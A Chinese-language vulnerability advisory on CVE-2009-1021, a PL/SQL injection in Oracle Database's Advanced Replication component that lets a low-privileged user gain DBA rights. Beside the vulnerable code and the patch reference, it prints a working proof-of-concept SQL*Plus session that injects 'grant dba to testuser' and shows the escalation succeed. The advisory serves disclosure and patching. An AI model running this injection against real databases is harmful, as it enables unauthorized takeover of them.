首页 -> 安全研究
安全研究
安全漏洞
Oracle Advanced Replication组件REPCAT_RPC.VALIDATE_REMOTE_RC()函数权限提升漏洞
发布日期:2009-07-14
更新日期:2009-11-05
受影响系统:
Oracle Database 9.2.0.8DV描述:
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5
BUGTRAQ ID: 35685
CVE ID: CVE-2009-1021
Oracle Database是一款商业性质大型数据库系统。
Oracle数据库Advanced Replication组件中的REPCAT_RPC.VALIDATE_REMOTE_RC()函数执行了可能受控的匿名PL/SQL。该函数取当前登录用户名为第一个参数,第二个参数VALIDATE_STRING直接放到了PLSQL的匿名块中并执行:
...
...
SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(SQL_CURSOR, 'BEGIN ' || ' :err :=
sys.dbms_repcat_validate.' || VALIDATE_STRING || '(:canon_gname);' || '
END;', DBMS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'err', ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'canon_gname', CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);
...
...
这可能允许攻击者以提升的权限执行任意代码。
<*来源:David Litchfield (david@nextgenss.com)
链接:http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
...
...
MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>
建议:
厂商补丁:
Oracle
------
Oracle已经为此发布了一个安全公告(cpujul2009)以及相应补丁:
cpujul2009:Oracle Critical Patch Update Advisory - July 2009
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
浏览次数:3195
严重程度:0(网友投票)
绿盟科技给您安全的保障